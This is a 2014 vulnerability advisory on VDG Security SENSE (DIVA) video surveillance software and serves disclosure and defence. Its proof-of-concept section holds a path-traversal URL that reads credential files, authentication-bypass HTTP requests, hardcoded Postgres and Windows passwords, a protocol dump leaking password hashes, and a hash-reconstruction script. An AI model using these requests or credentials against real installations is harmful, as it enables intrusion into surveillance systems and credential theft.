SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: VDG Security SENSE (formerly DIVA)
vulnerable version: 2.3.13
fixed version: unknown - no vendor confirmation
impact: critical
homepage: https://vdgsecurity.com/
found: 2014-10-01
by: Stefan Viehbck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"VDG Sense is our video management system (VMS). VDG Sense gives you control
of all live images and stored video data, in a user-friendly interface. Our
solution is based on an open platform, tailored to your specific needs and
requirements and ready to be integrated in any security solution."
Source: https://vdgsecurity.com/sense/
"DIVA is our former trademark, which we used to brand our video management
software and other VDG products. With the launch of our new trademark, VDG
Sense, we have rebranded the software to VDG Sense and promote it as such
from September 15, 2014. Other products, such as our servers, are available
under the label VDG."
Source: https://vdgsecurity.com/diva/
Business recommendation:
------------------------
Attackers are able to completely compromise the VDG SENSE server as they can
gain access at the system level. SENSE server can be used as an entry point
into the target infrastructure (lateral movement, privilege escalation).
It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
Although the vendor does not respond to our mails any more, some
vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).
It is assumed that further critical vulnerabilities exist.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the "SYSTEM" operating system user. These files include
configuration files containing sensitive information such as clear text
passwords/password hashes which can be used in further attacks.
2) Authentication bypass / Clear text password disclosure
Some parts of the DIVA application are vulnerable to authentication bypass. This
allows attackers to update DIVA plugin configuration. Furthermore DIVA plugin
configurations can be read. This configuration includes clear text DIVA
administrator credentials as DIVA plugins requires access to such an account
for operation.
3) Insecure service configuration / Hardcoded default credentials - Postgres
The PostgreSQL database is offered via the network (TCP port 5432) and can be
accessed remotely using hardcoded credentials which can't be changed.
4) Hardcoded default credentials - Windows Users
Several local Windows users are created in the course of the DIVA setup. These
are used to run some of the DIVA services. These users can be used to log on to the
server running DIVA.
5) Critical information disclosure / User database leakage
After authentication with the DIVA (fat) client via the proprietary protocol
(TCP port 51410) the server returns the contents of the user database
to the client. This works regardless of whether the user has administrator
rights or not.
The user database (users.ini) contains all users and their password hashes.
This information is sufficient to log in as another user. An attacker does not
require knowledge about plain text passwords.
6) Use of plain text protocols
All DIVA communication transport channels (eg. vie TCP port 80, 51410) lack
encryption.
7) Buffer overflow vulnerabilities
The DIVA web service API (/webservice) is vulnerable to a stack based buffer
overflow when processing "AuthenticateUser" requests. Both the "user" and the
"password" parameter are vulnerable.
None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass
DEP has been implemented.
Proof of concept:
-----------------
1) Unauthenticated local file disclosure
Arbitrary files can be downloaded because of vulnerabilities in the proprietary
web server implementation. An example for the x64 hosts:
http://<host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini
Interesting DIVA-specific files:
config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)
config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA
"master user")
config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin
configurations)
[...]
2) Authentication bypass / Clear text password disclosure
Authentication for parts of the application can be bypassed by sending the HTTP
Authorization header containing a colon ":".
GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
The response contains the plugin configuration for "divacal":
HTTP/1.1 200 OK
Date: Thu, 23 Okt 2014 10:46:28 GMT
Server: Diva HTTP Plugin 2.0
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: application/xml; charset=UTF-8
Content-Length: 1179
<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>
<settings>
<name>DivaCal settings</name>
<group>
<id>0</id>
<name>DIVA Connection</name>
<singleinstance>yes</singleinstance>
<showbuttons>yes</showbuttons>
<subgroup>
[...]
<setting>
<id>1</id>
<name>DIVAUsername</name>
<type>string</type>
<value>Administrator</value>
<default>Administrator</default>
<help>The username used to login to to the DIVA management server.</help>
</setting>
<setting>
<id>2</id>
<name>DIVAPassword</name>
<type>password</type>
<value>!DVadmin</value>
<default>!DVadmin</default>
<help>The password required to login to the DIVA management server.</help>
</setting>
</subgroup>
</group>
</settings>
Other activated plugins can be queried via the following request:
GET /plugins/?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
Plugin settings can be updated as follows:
POST /plugins/http/updatesettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
Content-Length: 29
groupid=0&DocumentRoot=htdocs
3) Insecure service configuration / Hardcoded default credentials - Postgres
The Postgres root user is as follows:
Username: root
Password: ArpaRomaWi
4) Hardcoded default credentials - Windows Users
The created Windows users are as follows:
Username: postgres
Password: !DVService
Username: NTP
Password: !DVService
5) Critical information disclosure / User database leakage
Below is an excerpt from the DIVA protocol communication (TCP port 51410):
00000000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 H....... ........ <-
SERVER
00000010 00 00 00 00 0d 00 00 20 01 00 02 20 03 00 00 20 ....... ... ...
00000020 06 00 11 00 32 2e 33 2e 31 33 00 00 02 00 00 20 ....2.3. 13.....
00000030 01 00 02 40 04 00 00 00 04 00 00 20 06 00 11 00 ...@.... ... ....
00000040 44 69 76 61 20 73 65 72 76 65 72 00 Diva ser ver.
00000000 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ <-
CLIENT
00000010 00 00 00 00 29 00 00 20 c9 00 02 40 05 00 00 20 ....).. ...@...
Note: client sends passwordHash and digestHash
00000020 f6 01 01 40 61 64 6d 69 6e 69 73 74 72 61 74 6f ...@admi nistrato
00000030 72 00 00 00 09 00 00 20 f7 01 01 40 49 41 68 6b r...... ...@IAhk
00000040 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k
00000050 41 42 32 64 51 79 38 3d 00 00 00 00 0a 00 00 20 AB2dQy8= .......
00000060 fa 01 01 40 35 34 38 31 35 36 32 31 38 64 33 65 ...@5481 56218d3e
00000070 31 63 35 35 66 63 30 30 35 65 38 32 61 32 32 30 1c55fc00 5e82a220
00000080 61 34 63 30 00 00 00 00 02 00 00 20 05 00 11 40 a4c0.... ... ...@
00000090 02 00 00 00 03 00 00 20 0b 00 11 40 00 00 00 00 ....... ...@....
000000A0 00 00 00 00 02 00 00 20 0f 00 11 40 00 00 00 00 ....... ...@....
000000B0 02 00 00 20 02 00 11 40 00 00 00 00 ... ...@ ....
0000004C 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0....... ........ <-
SERVER
0000005C 00 00 00 00 07 00 00 20 ca 00 02 40 02 00 00 20 ....... ...@...
0000006C f5 01 01 40 01 00 00 00 02 00 00 20 02 00 11 40 ...@.... ... ...@
0000007C 01 00 00 00 ....
000000BC 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 P....... ........ <-
CLIENT
000000CC 00 00 00 00 0f 00 00 20 01 00 1c 40 0b 00 00 20 ....... ...@...
000000DC 02 00 1c 40 47 45 54 20 2f 75 73 65 72 6d 61 6e ...@GET /userman
000000EC 61 67 65 6d 65 6e 74 2f 6f 73 64 73 74 79 6c 65 agement/ osdstyle
000000FC 73 20 44 49 56 41 2f 31 2e 30 00 00 01 00 00 20 s DIVA/1 .0.....
0000010C 03 00 1c 40 ...@
00000080 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........ <-
SERVER
00000090 00 00 00 00 04 00 00 20 07 01 11 40 02 00 00 20 ....... ...@...
000000A0 06 00 11 00 00 00 00 00 24 00 00 00 00 00 00 00 ........ $.......
[...]
00000200 9c 02 01 40 02 00 00 20 06 00 11 00 0d 0a 00 00 ...@... ........
00000210 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000220 00 00 00 00 2a 00 00 20 f4 01 01 40 28 00 00 20 ....*.. ...@(..
00000230 06 00 11 00 5b 61 64 6d 69 6e 69 73 74 72 61 74 ....[adm inistrat -----
00000240 6f 72 5d 0d 0a 61 64 6d 69 6e 72 69 67 68 74 73 or]..adm inrights |
00000250 3d 31 0d 0a 61 6e 64 72 6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |
00000260 67 65 73 74 48 61 73 68 3d 35 34 38 31 35 36 32 gestHash =5481562 |
00000270 31 38 64 33 65 31 63 35 35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |
00000280 32 61 32 32 30 61 34 63 30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <-
DIVA user database
00000290 3d 0d 0a 66 75 6c 6c 6e 61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |
000002A0 73 3d 0d 0a 70 61 73 73 77 6f 72 64 3d 49 41 68 s=..pass word=IAh |
000002B0 6b 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |
000002C0 6b 41 42 32 64 51 79 38 3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----
000002D0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........
For the sake of completeness the password hashing scheme has been reverse
engineered. As both hashes can be used for authentication directly, brute
force attacks against password hashes are not required.
#!/usr/bin/env python
import hashlib
from base64 import b64encode
user='administrator'
password='!DVadmin'
digestHash = hashlib.md5(user+":DIVA:"+password).digest().encode('hex').upper()
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password).digest()).digest())
print 'digestHash',digestHash
print 'passwordHash',passwordHash
6) Use of plain text protocols
No proof of concept necessary.
7) Buffer overflow vulnerabilities
Detailed proof of concept exploits have been removed for this vulnerability.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in 2.3.13, which was the most
recent version at the time of discovery.
Vendor contact timeline:
------------------------
2014-10-24: Sending responsible disclosure policy and requesting encryption
keys.
2014-10-28: Vendor responds, provides encryption keys.
2014-10-29: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-29: Vendor confirms receipt of advisory.
2014-11-10: Requesting status update.
2014-11-17: Vendor states that team is "very well on track to solve the
issues".
2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,
even in closed networks; referring to Shodan search results.
2014-12-10: Requesting status update. No reply.
2014-12-18: SEC Consult releases security advisory.
Solution:
---------
It seems some of the vulnerabilities are fixed in the most recent version of
SENSE (2.3.15). The vendor stopped responding to our emails so we don't know
what vulnerabilities were actually fixed.
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehbck / @2014